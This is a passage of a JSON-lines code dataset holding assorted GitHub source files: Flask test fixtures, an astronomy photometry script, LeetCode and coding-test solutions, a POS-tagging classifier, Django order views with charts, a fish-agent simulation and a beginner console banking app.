+{"seq_id":"40966581869","text":"import os\nimport pytest\nimport tempfile\n\n# This import prevents SQLAlchemy from throwing an AttributeError\n# claiming that is already a registered type -- it is suspicious\n# code and should eventually be either confirmed to fix a bug, or removed\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom Choys.flaskr import create_app\n\npytest_plugins = ['pytester']\n\n\n@pytest.fixture\ndef db_testdir(conftest, testdir):\n \"\"\"Set up a temporary test directory loaded with the configuration file for\n the tests.\"\"\"\n testdir.makeconftest(conftest)\n\n return testdir\n\n\n@pytest.fixture(scope='module')\ndef conftest():\n \"\"\"Load configuration file for the tests to a string, in order to run it in\n its own temporary directory.\"\"\"\n with open(os.path.join('tests', '_conftest.py'), 'r') as conf:\n conftest = conf.read()\n\n return conftest\n\n\n@pytest.fixture(scope='session')\ndef app(request):\n \"\"\"Session-wide test `Flask` application.\"\"\"\n settings_override = {\n 'TESTING': True,\n 'SQLALCHEMY_DATABASE_URI': os.environ['TEST_DATABASE_URL']\n }\n\n app = create_app(settings_override)\n\n # Establish an application context before running the tests.\n ctx = app.app_context()\n ctx.push()\n\n def teardown():\n ctx.pop()\n\n request.addfinalizer(teardown)\n return app\n\n\n@pytest.fixture(scope='session')\ndef _db(app, request):\n \"\"\"Session-wide test database.\"\"\"\n def teardown():\n db.drop_all()\n\n db = SQLAlchemy(app=app)\n\n request.addfinalizer(teardown)\n return db\n\n\n@pytest.fixture(scope='function')\ndef session(db, request):\n \"\"\"Creates a new database session for a test.\"\"\"\n connection = db.engine.connect()\n transaction = connection.begin()\n\n options = dict(bind=connection, binds={})\n session = db.create_scoped_session(options=options)\n\n db.session = session\n\n def teardown():\n transaction.rollback()\n connection.close()\n session.remove()\n\n request.addfinalizer(teardown)\n return session\n\n\n@pytest.fixture\ndef client(app):\n db_fd, app.config['DATABASE'] = tempfile.mkstemp()\n app.config['TESTING'] = True\n\n with app.test_client() as client:\n yield client\n\n os.close(db_fd)\n os.unlink(app.config['DATABASE'])\n","repo_name":"bmaximuml/Choys","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"22793654787","text":"import numpy as np\nimport csv\nimport math as math\nfrom utilities import *\n#from scipy import interpolate\nimport requests\nfrom contextlib import closing\nfrom filterlist_to_filterfiles import *\nimport string\n\n'''\nsn_name is a string with the desired supernova name\ndesired_filter_list is an array of the filters which have data\nprogram writes two csv files\n--magarray.csv has the magnitudes and errors for the desired filters\n--countsarray.csv has the interpolated counts for all times at all filters\n'''\n\n\ndef observedmags_to_counts_2(sn_name, desired_filter_list, template_spectrum, interpFilter = \"UVW1\"):\n input_file = open('../input/'+ sn_name + '_osc.csv', 'r+')\n data = input_file.read()\n data = data.splitlines()\n data_list = []\n for line in data:\n data_list.append(line.split(','))\n\n time = []\n mag = []\n emag = []\n band = []\n \n for x, line in enumerate(data_list):\n if x != 0 and str(line[5]).upper() in desired_filter_list:\n # This checks if there is an uncertainty (error) given. \n # If not, skip it as the magnitude is an upper limit not a measurement\n if line[3] != '':\n time.append(float(line[1]))\n mag.append(float(line[2]))\n emag.append(float(line[3]))\n band.append((str(line[5])).upper())\n\n filter_file_list,zeropointlist,pivotlist = filterlist_to_filterfiles(desired_filter_list, template_spectrum)\n\n interpFirst = 1000000000000000\n interpLast = -1000000000000000\n for i in range(0, len(time)):\n if(band[i] == interpFilter and mag[i] > 0):\n if(time[i] < interpFirst):\n interpFirst = time[i]\n if(time[i] > interpLast):\n interpLast = time[i]\n\n interpTimes = []\n #for nonzero filters in interval of interpolation\n for i in range(0, len(time)):\n if interpFirst <= time[i] <= interpLast:\n if band[i] == interpFilter:\n interpTimes.append(time[i])\n\n #Adding the variables\n with open('../output/Test_A.csv', 'a', newline='') as file:\n writer = csv.writer(file)\n writer.writerow([2, \"Time\", time])\n writer.writerow([3, \"Mag\", mag])\n writer.writerow([4, \"Emag\", emag])\n writer.writerow([5, \"Band\", band])\n writer.writerow([6, \"Interptimes\", interpTimes])\n\n\n #contains counts directly from measured values\n counts_matrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n counterrs_matrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n #contains measured magnitudes\n magMatrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n #contains measured error on magnitudes\n emagMatrix = np.zeros((len(desired_filter_list),len(time)), dtype=object)\n\n #contains interpolated count values for all filters over all times\n interp_counts_matrix = np.zeros((len(desired_filter_list),len(interpTimes)))\n interp_counterrs_matrix = np.zeros((len(desired_filter_list),len(interpTimes)))\n interpMatrix = np.zeros((len(desired_filter_list),len(interpTimes)))\n\n for i in range(len(desired_filter_list)):\n measured_counts = np.zeros(len(time))\n measured_counterrs = np.zeros(len(time))\n measured_times = np.zeros(len(time))\n length = 0\n\n###### does this have to be done in a for loop or can python operate on the whole row/column at once?\n\n for j in range(len(time)):\n\n if band[j] == desired_filter_list[i]:\n\n counts_matrix[i][j] = str(math.pow(10, -0.4*(mag[j]-zeropointlist[i]))) \n counterrs_matrix[i][j] = str(abs(float(counts_matrix[i][j])*float(emag[j])*-1.0857)) # need to check if this works\n\n magMatrix[i][j] = str(mag[j])\n emagMatrix[i][j] = emag[j]\n measured_counts[length] = float(counts_matrix[i][j])\n measured_counterrs[length] = float(counterrs_matrix[i][j])\n measured_times[length] = time[j]\n length += 1\n else:\n counts_matrix[i][j] = ''\n counterrs_matrix[i][j] = ''\n magMatrix[i][j] = ''\n emagMatrix[i][j] = ''\n measured_counts.resize(length)\n measured_counterrs.resize(length)\n measured_times.resize(length)\n interp_counts_matrix[i] = np.interp(interpTimes, measured_times, measured_counts)\n interp_counterrs_matrix[i] = np.interp(interpTimes, measured_times, measured_counterrs)\n\n column_err_names = []\n\n for l in range(len(desired_filter_list)):\n column_err_names.append(desired_filter_list[l]+'err')\n\n column_names = ['Time (MJD)']\n\n for l in range(len(desired_filter_list)):\n column_names.append(desired_filter_list[l])\n column_names.append(column_err_names[l])\n\n\n with open('../output/MAGS/'+ sn_name + '_magarray.csv', 'w', newline='') as csvFile:\n writer = csv.writer(csvFile, delimiter=',')\n writer.writerows([column_names])\n for i in range(0,len(interpTimes)):\n line = np.zeros(1+2*len(desired_filter_list),dtype=object)\n line[0] = str(interpTimes[i])\n for j in range(0,len(desired_filter_list)):\n line[2*j + 1] = magMatrix[j][i]\n line[2*j + 2] = emagMatrix[j][i]\n writer.writerow(line)\n\n\n with open('../input/COUNTS/'+ sn_name + '_countsarray.csv', 'w', newline ='') as csvFile:\n writer = csv.writer(csvFile, delimiter=',')\n writer.writerows([column_names])\n for i in range(0,len(interpTimes)):\n line = np.zeros(1+2*len(desired_filter_list))\n line[0] = interpTimes[i]\n for j in range(0,len(desired_filter_list)):\n line[2*j+1] = interp_counts_matrix[j][i]\n line[2*j+2] = interp_counterrs_matrix[j][i]\n writer.writerow(line)","repo_name":"pbrown801/aggienova-templates","sub_path":"python/observedmags_to_counts.py","file_name":"observedmags_to_counts.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"3148388412","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n a = list(map(int, input().split()))\n a = a[::-1]\n for i in range(1, n):\n while a[i] > a[i-1]:\n a[i] = a[i]//2\n a = a[::-1]\n print(*a)","repo_name":"SongJungHyun1004/Coding_Test","sub_path":"02주차/타노스 정렬 1.py","file_name":"타노스 정렬 1.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1176502743","text":"#\n# @lc app=leetcode.cn id=208 lang=python3\n#\n# [208] 实现 Trie (前缀树)\n#\n\n# @lc code=start\n\nclass Node(object):\n green, black = 1, 0\n\n def __init__(self, val=None, color=0):\n self.val = val\n self.child = []\n self.child_val = ''\n self.color = color\n\n def insert(self, ch, color):\n '''\n 在当前节点插入一个字符. \n '''\n idx = self.child_val.find(ch)\n if idx == -1:\n self.child_val += ch\n self.child.append(Node(ch, color))\n return self.child[-1]\n else:\n if self.child[idx].color == Node.black:\n self.child[idx].color = color\n return self.child[idx]\n\n def search(self, word):\n node = self\n for ch in word:\n idx = node.child_val.find(ch)\n if idx != -1:\n node = node.child[idx]\n else:\n return False\n return node.color == Node.green\n \n def startsWith(self, word):\n node = self\n for ch in word:\n idx = node.child_val.find(ch)\n if idx == -1:\n return False\n else:\n node = node.child[idx]\n return True\n\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = Node()\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n n = len(word)\n node = self.root\n for i, ch in enumerate(word):\n if i == n-1:\n node.insert(ch, Node.green)\n else:\n node = node.insert(ch, Node.black)\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n return self.root.search(word)\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n return self.root.startsWith(prefix)\n\n\n# if __name__ == '__main__':\n# trie = Trie()\n# trie.insert('apple')\n# print(trie.search('app')) # False\n# trie.insert('app')\n# print(trie.search('app')) # True\n# trie.insert('apps')\n# print(trie.search('app')) # True\n# print(trie.search('apple')) # True\n# print(trie.startsWith('ap')) # True\n# print(trie.startsWith('apP')) # False\n# trie.insert('apP')\n# print(trie.search('apP')) # True\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n# @lc code=end\n","repo_name":"labusi/oj-problems","sub_path":"leetcode/python/208.实现-trie-前缀树.py","file_name":"208.实现-trie-前缀树.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"7154355182","text":"## general imports\nimport random\nimport itertools \nfrom pprint import pprint \nimport numpy as np\nimport pandas as pd \nfrom sklearn.model_selection import train_test_split # data splitter\nfrom sklearn.linear_model import LogisticRegression\nimport re\nimport copy as cp\n\n\n## project supplied imports\nfrom submission_specs.SubmissionSpec12 import SubmissionSpec12\n\nclass Submission(SubmissionSpec12):\n ''' a contrived poorely performing solution for question one of this Maman '''\n __TAG_IDX = 1\n __WORD_IDX = 0\n __START_TAG = \"\"\n __END_TAG = \"\"\n __NUM_OF_PATHS = 3\n __START_GRAM = (None, None)\n __END_GRAM = (None, None)\n __SPECIAL_FEATURES_NUM = 11\n\n def __init__(self):\n self._tag_set = np.array('ADJ ADP PUNCT ADV AUX SYM INTJ CCONJ X NOUN DET PROPN NUM VERB PART PRON SCONJ'.split())\n self._tag_to_num = {tag:idx for idx, tag in enumerate(self._tag_set)}\n self._lrm = LogisticRegression(multi_class='multinomial', solver='lbfgs', max_iter=1000)\n self._ngrams = set()\n self._N = len(self._tag_set)\n self._pis = np.zeros(self._N, dtype=np.float64)\n\n def _estimate_transition_probabilites(self, annotated_sentences):\n pass\n\n def _estimate_emission_probabilites(self, annotated_sentences):\n pass\n\n def _get_word_ngrams(self, min_ngram_len, max_ngram_len, token):\n '''\n a helper function we use to build all character ngrams upon initialization,\n in case we choose to use character ngrams as features\n '''\n\n word_ngrams = set()\n\n # per ngram length\n for n in range(min_ngram_len, max_ngram_len + 1):\n # sliding window iterate the token to extract its ngrams\n for idx in range(len(token) - n + 1):\n ngram = token[idx: idx + n]\n word_ngrams.add(ngram)\n\n return word_ngrams # return value used for test only\n\n def _calc_pis(self, grams):\n start_grams = dict()\n for k, v in grams.items():\n if k[0] == self.__START_GRAM:\n work_gram = (None, k[1][1])\n if work_gram not in start_grams:\n start_grams[work_gram] = v\n else:\n start_grams[work_gram] += v\n\n for idx in range(self._N):\n tag = self._tag_set[idx]\n gram = (None, self._tag_set[idx])\n if gram in start_grams:\n self._pis[idx] = start_grams[gram] / self._tag_count[tag]\n\n def _get_vocabulary(self, sentences):\n '''\n calculates all needed initial parts , trigrams, number of words set of words\n counts tags and pis\n :param sentences: sentences to inspect\n :return: vocabulary\n '''\n V = set()\n self._tri_grams = dict()\n\n self._total_ngrams = 0\n self.total_words = 0\n self._tag_count = dict()\n for sentence in sentences:\n for idx, token in enumerate(sentence):\n gram = self._create_trigram(sentence, idx)\n V.add(token[self.__WORD_IDX])\n if gram in self._tri_grams.keys():\n self._tri_grams[gram] += 1\n else:\n self._tri_grams[gram] = 1\n if token[self.__TAG_IDX] in self._tag_count.keys():\n self._tag_count[token[self.__TAG_IDX]] += 1\n else:\n self._tag_count[token[self.__TAG_IDX]] = 1\n self._total_ngrams += 1\n self.total_words += 1\n\n self._calc_pis(self._tri_grams)\n\n self._word_count = len(V)\n self._trigram_count = len(self._tri_grams)\n return V\n\n def _create_ngrams_list(self, sentences, min_ngram=1, max_ngram=2):\n V = self._get_vocabulary(sentences)\n for t in V:\n self._ngrams |= self._get_word_ngrams(min_ngram, max_ngram, t)\n\n def _create_vectors(self, sentences):\n #TODO: check if we can train on one ngram at a time or we need to multiply the ngrams\n y = np.zeros(self._total_ngrams)\n #X = np.zeros(self._total_ngrams, dtype=list)\n X = [0] * self._total_ngrams\n '''y = np.zeros(len(self._tri_grams))\n X = [0] * len(self._tri_grams)'''\n\n #location in vect\n loc = 0\n for gram, times in self._tri_grams.items():\n fv = self._vectorize(gram)\n c = self._tag_to_num[gram[1][1]]\n\n y[loc:loc+times] = c\n\n for t in range(times):\n X[loc+t] = fv\n\n loc += times\n\n '''y[loc] = c\n X[loc] = fv\n loc += 1'''\n\n assert len(y) == len(X)\n\n return X, y\n\n def _word_vectorize(self, word, tag, vect, start=0, main_word=False):\n '''size of the vector is size of ngrams * 3 + is all upper + starts with capital\n + has numbers and dash + has a number + special letter + word shape capitals to regulars, num of capitals,\n num of regulars, num of punct, num of numbers and N for number of states'''\n offset = start\n offest_count = 2\n\n if main_word:\n #check if word contains starts with or ends with one of the ngrams\n for ngram in self._ngrams:\n '''if ngram in word:\n vect[offset] = 1'''\n if word.startswith(ngram):\n vect[offset] = 1\n if word.endswith(ngram):\n vect[offset + 1] = 1\n offset += offest_count\n\n\n caps = re.findall(r\"[A-Z]\", word)\n nums = re.findall(r\"[0-9]\", word)\n lower = re.findall(r\"[a-z]\", word)\n punct = re.findall(r\"[.?\\-,\\\"]+\", word)\n\n #is all upper\n if not re.findall(r\"^[A-Z]+$\", word):\n vect[offset] = 1\n offset += 1\n\n #starts with capital\n if re.findall(r\"^[A-Z][A-Za-z0-9]+$\", word):\n vect[offset] = 1\n offset += 1\n\n #has only capitals dash and numbers\n if re.findall(r\"^[A-Z]+-[0-9]+\", word):\n vect[offset] = 1\n offset += 1\n\n #contains a number\n if re.findall(r\"[0-9]\", word):\n vect[offset] = 1\n offset += 1\n\n if 'ing' in word:\n vect[offset] = 1\n offset += 1\n\n tmpWord = word.lower()\n if 'a' in tmpWord or 'e' in tmpWord or 'u' in tmpWord or 'o' in tmpWord or 'i' in tmpWord:\n vect[offset] = 1\n offset += 1\n\n if 'ing' in tmpWord:\n vect[offset] = 1\n offset += 1\n\n vect[offset] = len(caps)\n vect[offset + 1] = len(lower)\n vect[offset + 2] = len(nums)\n vect[offset + 3] = len(punct)\n\n vect[offset + 4 + self._tag_to_num[tag]] = 1\n\n return vect\n\n def _create_trigram(self, sentence, idx, states=None):\n gram = [self.__START_GRAM, self.__START_GRAM, self.__END_GRAM]\n\n def assign_grams(gid, id):\n if not states:\n grm = (sentence[id][self.__WORD_IDX], sentence[id][self.__TAG_IDX])\n else:\n grm = (sentence[id], self._tag_set[states[gid]])\n gram[gid] = tuple(grm)\n\n assign_grams(1, idx)\n\n if idx > 0:\n assign_grams(0, idx - 1)\n\n if idx < len(sentence) - 1:\n assign_grams(2, idx + 1)\n\n return tuple(gram)\n\n def _vectorize(self, gram):\n # the size of the vector is fv_len and two words between it\n vector = np.zeros(self._fv_size + 2*self._fv_size_no_ngrams)\n\n self._word_vectorize(gram[1][self.__WORD_IDX], gram[1][self.__TAG_IDX], vector, 0, True)\n\n if gram[0] != self.__START_GRAM:\n self._word_vectorize(gram[0][self.__WORD_IDX], gram[0][self.__TAG_IDX], vector, self._fv_size)\n\n if gram[2] != self.__END_GRAM:\n self._word_vectorize(gram[2][self.__WORD_IDX], gram[2][self.__TAG_IDX], vector, self._fv_size+self._fv_size_no_ngrams)\n\n # our feature vector\n return vector\n\n def _get_lrm_prediction(self, sentence, idx, states=None):\n gram = self._create_trigram(sentence, idx, states)\n X = self._vectorize(gram).reshape(1, -1)\n z = self._lrm.classes_\n Cp = [0] * self._N\n for probList in self._lrm.predict_proba(X):\n for idx, prob in enumerate(probList):\n Cp[int(z[idx])] = prob\n return Cp\n\n #\n # return self._lrm.predict_proba(X)\n\n def _viterbi(self, sentence):\n if sentence is None:\n return\n N = self._N\n T = len(sentence)\n viterbi_mat = np.zeros((N, T))\n backpointer = np.full((N, T), -1)\n #init the lettece matrix\n for s in range(N):\n pred = self._get_lrm_prediction(sentence, 0, [None, s, s+1])\n viterbi_mat[s, 0] = pred[s]*self._pis[s]\n\n for t in range(1, T):\n for s_i in range(N):\n pred = np.zeros(N)\n for s_j in range(N):\n pred[s_j] = self._get_lrm_prediction(sentence, t, [s_i, s_j, s_i+1])[s_j]\n vitmax = pred * viterbi_mat[:, t-1]\n viterbi_mat[s_i, t] = np.max(vitmax)\n backpointer[s_i, t] = np.argmax(vitmax)\n\n best_path_probe = np.max(viterbi_mat[:, T - 1])\n best_back_pointer = int(np.argmax(viterbi_mat[:, T - 1]))\n\n best_path = list() # [self._tag_set[int(best_back_pointer)]]\n best_path.append(self._tag_set[best_back_pointer])\n for t in reversed(range(0, T - 1)):\n next_tag = int(backpointer[np.argmax(viterbi_mat[:, t + 1]), t + 1])\n best_path.append(self._tag_set[next_tag])\n\n return best_path[::-1], best_path_probe\n\n def train(self, annotated_sentences):\n ''' trains the HMM model (computes the probability distributions) '''\n self._create_ngrams_list(annotated_sentences)\n self._fv_size = len(self._ngrams) * 2 + self.__SPECIAL_FEATURES_NUM + len(self._tag_set) # size of the feature vector\n self._fv_size_no_ngrams = self.__SPECIAL_FEATURES_NUM + len(self._tag_set)\n X, y = self._create_vectors(annotated_sentences)\n self._lrm.fit(X, y)\n return self\n\n def predict(self, sentence):\n prediction, _ = self._viterbi(sentence)\n return prediction\n","repo_name":"calebxyz/ONLP-12","sub_path":"test other/solution12.py","file_name":"solution12.py","file_ext":"py","file_size_in_byte":10303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10685198071","text":"from django.shortcuts import render, redirect, get_object_or_404, HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models.functions import ExtractMonth\nfrom django.db.models import Count, Sum\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Page, Bar, Pie\nfrom .models import Order\nfrom stock.models import Stock\nfrom .forms import EditForm\n\n\ndef index(request):\n page = request.GET.get('page') # 当前页码, 缺少时为第1页\n results = Order.objects.all()\n paginator = Paginator(results, 10)\n try:\n current_page = paginator.page(page)\n data_list = current_page.object_list\n except PageNotAnInteger:\n current_page = paginator.page(1)\n data_list = current_page.object_list\n except EmptyPage:\n current_page = paginator.page(paginator.num_pages)\n data_list = current_page.object_list\n return render(request, 'order/index.html', locals()) # 模板文件路径没有提示, 不检查路径\n\n\ndef create(request):\n if request.method == 'POST':\n form = EditForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n stock = cd['stock'] # 当前选中的库存商品\n quantity = cd['quantity'] # 当前订购的数量\n\n # 剩余商品数量\n remaining = stock.unit_in_stock - stock.unit_on_order\n # 如果库存剩余商品数量 大于等于 订购数量\n if remaining >= quantity:\n order = form.save()\n # 忽略输入界面中的总价, 使用 单价 * 数量 进行计算\n order.total_price = order.price * order.quantity\n order.save() # 保存计算后总价\n # 修改库存商品的已购数量\n stock.unit_on_order += order.quantity\n stock.save() # 保存修改后库存信息\n return redirect(index)\n\n error_msg = f'库存数量不足, 还剩 {remaining} {stock.quantity_unit}'\n return render(request, 'order/edit.html', locals())\n\n error_msg = '添加数据出错,请检查输入的数据格式'\n return render(request, 'order/edit.html', locals())\n\n form = EditForm()\n return render(request, 'order/edit.html', locals())\n\n\ndef update(request, id):\n data = get_object_or_404(Order, pk=id)\n if request.method == 'POST':\n form = EditForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n # 查找修改前的订单\n old_order = get_object_or_404(Order, pk=id)\n stock = cd['stock']\n data.stock = stock\n data.customer = cd['customer']\n data.quantity = cd['quantity']\n data.quantity_unit = cd['quantity_unit']\n data.price = cd['price']\n data.total_price = cd['total_price']\n data.time_on_order = cd['time_on_order']\n # 如果修改了订单中商品数量, 同时修改 库存中的已售数量\n stock.unit_on_order += (data.quantity - old_order.quantity)\n # 当修改商品订单数量时, 有足够的剩余才保存, 否则不保存(保存就是实现修改)\n if stock.unit_in_stock - stock.unit_on_order >= 0:\n data.save()\n stock.save() # 保存\n return redirect(index)\n\n error_msg = '商品库存数量不足'\n return render(request, 'order/edit.html', locals())\n\n error_msg = '修改数据出错,请检查输入的数据格式'\n return render(request, 'order/edit.html', locals())\n\n form = EditForm(initial={\n 'stock': data.stock,\n 'customer': data.customer,\n 'quantity': data.quantity,\n 'quantity_unit': data.quantity_unit,\n 'price': data.price,\n 'total_price': data.total_price,\n 'time_on_order': data.time_on_order,\n })\n return render(request, 'order/edit.html', locals())\n\n\ndef delete(request, id):\n data = get_object_or_404(Order, pk=id)\n if request.method == 'POST':\n data.delete()\n return redirect(index)\n\n return render(request, 'order/delete.html', locals())\n\n\ndef detail(request, id):\n data = get_object_or_404(Order, pk=id)\n return render(request, 'order/detail.html', locals())\n\n\ndef report(request):\n # .values(\"customer__name\") 第一个 .values(), 进行分组的字段, 相同的会合并进行汇总\n data_customer = Order.objects.values(\"customer__name\").annotate(\n # .annotate() 汇总的项目\n month=ExtractMonth('time_on_order'), # ExtractMonth 用于按月获取数据\n total=Sum(\"total_price\")).values(\n # 最后的 .values(), 分类汇总结果输出的字段\n \"customer__name\", \"total\", \"month\")\n # 使用 HttpResponse 在浏览器检查汇总的结果\n # return HttpResponse(data)\n if data_customer:\n # Bar为柱状图\n bar = Bar(init_opts=opts.InitOpts(width='800px', height='400px'))\n # x轴显示信息\n bar.add_xaxis([f\"{i['month']}月 - {i['customer__name']}\" for i in data_customer])\n # 添加一个Y轴信息\n bar.add_yaxis('消费总金额: ', [i['total'] for i in data_customer])\n # 生成图表时html文件的路径从 templates 开始,\n # 提前建好渲染的空 html 文件, 否则第一次启动并且没有数据时会出现异常\n bar.render('templates/render/bar_customer.html')\n\n data_products = Order.objects.values(\"stock__product__name\").annotate(\n # .annotate() 汇总的项目\n month=ExtractMonth('time_on_order'),\n total=Sum(\"total_price\")).values(\n \"stock__product__name\", \"total\", \"month\")\n # return HttpResponse(data_products)\n\n if data_products:\n # Pie 用于生成饼图\n pie_product = Pie(init_opts=opts.InitOpts(width='400px', height='250px'))\n # 饼图的颜色列表\n pie_product.set_colors([\"blue\", \"green\", \"yellow\", \"red\", \"pink\", \"orange\", \"purple\"])\n # 设置标题\n pie_product.set_global_opts(\n title_opts=opts.TitleOpts(title=\"每月商品销售额比例\"),\n # 设置图例位置\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"70%\", orient=\"vertical\"), )\n # 添加饼图数据\n pie_product.add(\n \"\",\n [list(z) for z in zip(\n [f\"{i['month']}月 - {i['stock__product__name']}\" for i in data_products], # 文字\n [i['total'] for i in data_products])], # 数值\n radius=[\"30%\", \"75%\"], # 可选项\n center=[\"35%\", \"50%\"], # 可选项\n rosetype=\"radius\", # 可选项\n )\n # 生成到第二个文件, 生成图表时html文件的路径从 templates 开始, 提前建好渲染的空 html 文件\n pie_product.render('templates/render/pie_product.html')\n\n data_supplier = Order.objects.values(\"stock__supplier__name\").annotate(\n # .annotate() 汇总的项目\n # month=ExtractMonth('time_on_order'),\n total=Sum(\"total_price\")).values(\n \"stock__supplier__name\", \"total\", )\n # return HttpResponse(data_supplier)\n\n if data_supplier:\n pie_supplier = Pie(init_opts=opts.InitOpts(width='400px', height='250px'))\n pie_supplier.set_colors([\"blue\", \"green\", \"yellow\", \"red\", \"pink\", \"orange\", \"purple\"])\n # 设置标题\n pie_supplier.set_global_opts(\n title_opts=opts.TitleOpts(title=\"每月按供应商销售金额比例\"),\n # 设置图例位置\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"70%\", orient=\"vertical\"), )\n # # pie_product.set_series_opts()\n pie_supplier.add(\n \"\",\n [list(z) for z in zip(\n [i['stock__supplier__name'] for i in data_supplier],\n [i['total'] for i in data_supplier])],\n radius=[\"30%\", \"75%\"],\n center=[\"35%\", \"50%\"],\n rosetype=\"radius\",\n )\n # 生成到第三个文件, 生成图表时html文件的路径从 templates 开始, 提前建好渲染的空 html 文件\n pie_supplier.render('templates/render/pie_supplier.html')\n\n # 在 'order/report.html' 引用 以上生成的三个文件\n return render(request, 'order/report.html', locals())\n","repo_name":"hujiyi/mystore","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34970821973","text":"import math, random\nimport logging, os, sys\nimport numpy as np\nfrom src.models.arena import Arena\nfrom src.models.agent import Agent\nfrom PyQt5.QtCore import *\n\n\nclass Fish(Agent):\n \"\"\"\n Fish class.\n Inherits tick() and move() from agent class.\n Additionally handles checking if it follows the robot.\n\n\n Args:\n Agent (Agent): Parent base class\n \"\"\"\n\n def __init__(\n self,\n id,\n pos,\n ori,\n arena,\n config,\n dir=None,\n zoa=None,\n zoo=None,\n zor=None,\n time_step=None,\n ):\n super().__init__(id, pos, ori, arena, config, dir, zor, zoo, zoa, time_step)\n\n # self.aligned_with_robot = False\n self.follow_angle = self.config[\"DEFAULTS\"][\"follow_angle\"]\n self.follow_angle_cos = np.cos(np.radians(self.follow_angle))\n self.following = False\n self.cos_max_turn_per_time_step = np.cos(\n np.radians(self.max_turn_rate * self.time_step * 10)\n )\n\n def check_following(self, robot_pos, robot_dir):\n \"\"\"Check if fish follows robot\n\n Args:\n robot_pos (list): Current robot position\n robot_dir (list): Current robot direction\n \"\"\"\n try:\n # robot in attaction zone\n if self.influenced_by_robot:\n # check if robot swims in same direction as fish\n # orientation difference can't be larger than max turning rate * 10 (roughly same direction)\n # calculate angle between both directions\n inner = np.inner(self.dir, robot_dir)\n norms = np.linalg.norm(self.dir) * np.linalg.norm(robot_dir)\n ori_diff = inner / norms\n roughly_same_dir = ori_diff >= self.cos_max_turn_per_time_step\n\n # robot must be in front of fish\n # cos of angle between (robot_pos-self.pos) vector and self.dir cannot be smaller than 0 (angle can't be larger than pi/2 -> 90degrees) / smaller than 60 -> cos(radians(80)) = 0.17365152758\n between_v = robot_pos - self.pos\n inner = np.inner(between_v, self.dir)\n norms = np.linalg.norm(between_v) * np.linalg.norm(self.dir)\n ori_diff2 = inner / norms\n in_front = ori_diff2 > self.follow_angle_cos\n\n if roughly_same_dir and in_front:\n self.following = True\n return\n self.following = False\n except Exception:\n logging.error(\"FISH: Error while following check\")\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n logging.error(exc_type, fname, exc_tb.tb_lineno)\n","repo_name":"jotpio/behavior_HF","sub_path":"src/models/fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30293022264","text":"import json\nfrom time import sleep\nimport os\nfrom getpass import getpass\n\ndef dec1(str):\n print(\"*\"*120)\n print((\"--\"+str+\"--\").center(120))\n print(\"*\"*120)\n print(\"\\n\")\n\n\ndef clear(str):\n os.system(\"cls\")\n dec1(str)\n\n\ndef get_data():\n fp=open(\"G://Workspace/Python/Bank/data.db\",\"r+\")\n data=json.load(fp)\n fp.close()\n return data\n\ndef leap(a):\n if a%4==0 and a%100==0:\n if a%400==0:\n return 1\n else:\n return 0\n elif a%4==0:\n return 1\n else:\n return 0\n\ndef put_data(data):\n fp=open(\"G://Workspace/Python/Bank/data.db\",\"w\")\n json.dump(data,fp)\n fp.close()\n\ndef load():\n \n print(\"Loading\",end='')\n \n for var in range(6):\n sleep(0.4)\n print('.',end='')\n\ndef loan():\n clear(\"Loan \")\n acn=input(\"Enter Your Account Number:-\")\n data=get_data()\n if acn not in (data.keys()-['mgr','key']):\n clear(\"Loan\")\n print(\"acount number not available please try again\".center(120,\"*\"))\n load()\n loan()\n i=0\n while i==0:\n usr_nm=input(\"Enter user name:-\")\n paswd=getpass(\"Enter password:-\")\n data=get_data()\n if usr_nm!=data[acn]['user'] or paswd!=data[acn]['password']:\n clear(\"Withdrawal\")\n print(\"Transaction Failed\".center(120,\"*\"))\n print(\"username or password incorrect please try again\".center(120,\"*\"))\n else:\n i=1\n clear(\"Loan\")\n print(\"-.-.-.-.-.-.-.-.-Select your Profession-.-.-.-.-.-.-.-.-\")\n ch=int(input(\"1.Govt. employee\\n2.Private Employee\\n3.Businessman\\n4.Student\\n5.Unemployeed\\n\"))\n if ch==1:\n load()\n govt(acn)\n if ch==2:\n load()\n pvt_emp(acn)\n if ch==3:\n load()\n business(acn)\n if ch==4 or ch==5:\n load()\n clear(\"Loan\")\n print(\"You are Not Eligible for loan\")\n else:\n clear()\n 